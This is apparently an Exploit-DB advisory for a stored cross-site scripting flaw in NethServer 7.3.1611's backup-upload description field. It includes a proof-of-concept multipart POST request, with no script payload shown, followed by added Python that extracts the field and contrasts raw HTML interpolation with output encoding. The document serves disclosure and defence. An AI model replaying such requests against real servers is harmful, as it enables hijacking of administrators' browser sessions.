NethServer 7.3.1611 - Cross-Site Request Forgery / Cross-Site Scripting

EDB-ID: 42579
Author: LiquidWorm
Published: 2017-08-28
Type: Webapps
Platform: JSON
Vulnerable App: N/A


Product web page:
Affected version: 7.3.1611-u1-x86_64

Summary: NethServer is an operating system for the Linux enthusiast,
designed for small offices and medium enterprises. It's simple, secure
and flexible.

Desc: NethServer suffers from an authenticated stored XSS vulnerability.
Input passed to the 'BackupConfig[Upload][Description]' POST parameter is
not properly sanitised before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in
the context of an affected site.

Tested on: Kernel 3.10.0-514.el7.x86_64 on an x86_64
CentOS Linux 7.3.1611 (Core)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2017-5432
Advisory URL:



PoC request:

POST /en-US/BackupConfig/Upload.json HTTP/1.1
Connection: close
Content-Length: 15762
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8FfEu2Tn6fUOnT80
Accept-Language: en-US,en;q=0.8,mk;q=0.6
Cookie: nethgui=4igflab8fmbi5aq26pvsp5r0f2

------WebKitFormBoundary8FfEu2Tn6fUOnT80
Content-Disposition: form-data; name="arc"; filename="backup-config.7z.xz"
Content-Type: application/x-xz

[xz content omitted]
------WebKitFormBoundary8FfEu2Tn6fUOnT80
Content-Disposition: form-data; name="BackupConfig[Upload][Description]"
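The description field travels in the multipart body shown above. As an added illustration (not NethServer's or Nethgui's code), the following Python extracts that field from a constructed body using the advisory's boundary value and contrasts raw interpolation into HTML with output encoding, which is the fix for the class of bug reported here. The parser, the sample body and the render functions are all assumptions for this example.

```python
"""Added example (not NethServer/Nethgui code): pull the description field
out of a multipart upload and render it with and without HTML encoding."""
import html
import re

# Boundary value taken from the advisory's Content-Type header.
BOUNDARY = "----WebKitFormBoundary8FfEu2Tn6fUOnT80"

# Constructed sample body: the 'arc' file part followed by the description
# part. The description value is a harmless marker containing markup.
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="arc"; filename="backup-config.7z.xz"\r\n'
    "Content-Type: application/x-xz\r\n\r\n"
    "<xz bytes>\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="BackupConfig[Upload][Description]"\r\n\r\n'
    "Weekly backup <b>test</b>\r\n"
    f"--{BOUNDARY}--\r\n"
)


def parse_multipart(body: str, boundary: str) -> dict:
    """Minimal multipart/form-data parser: returns {field name: value}."""
    fields = {}
    for part in body.split(f"--{boundary}"):
        part = part.strip("\r\n")
        if not part or part == "--":  # leading empty chunk / closing delimiter
            continue
        headers, _, value = part.partition("\r\n\r\n")
        match = re.search(r'name="([^"]+)"', headers)
        if match:
            fields[match.group(1)] = value
    return fields


def render_unsafe(description: str) -> str:
    """Vulnerable pattern: raw interpolation into HTML (what the advisory reports)."""
    return f"<td>{description}</td>"


def render_safe(description: str) -> str:
    """Hardened pattern: HTML-encode the value before placing it in element content."""
    return f"<td>{html.escape(description, quote=True)}</td>"


def description_from_request(body: str = SAMPLE_BODY) -> str:
    """Extract the description field the advisory names from a request body."""
    return parse_multipart(body, BOUNDARY)["BackupConfig[Upload][Description]"]
```

Any later rendering of the stored description should go through the encoded path; encoding must match the output context (element content here, attribute or JavaScript contexts need their own rules).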

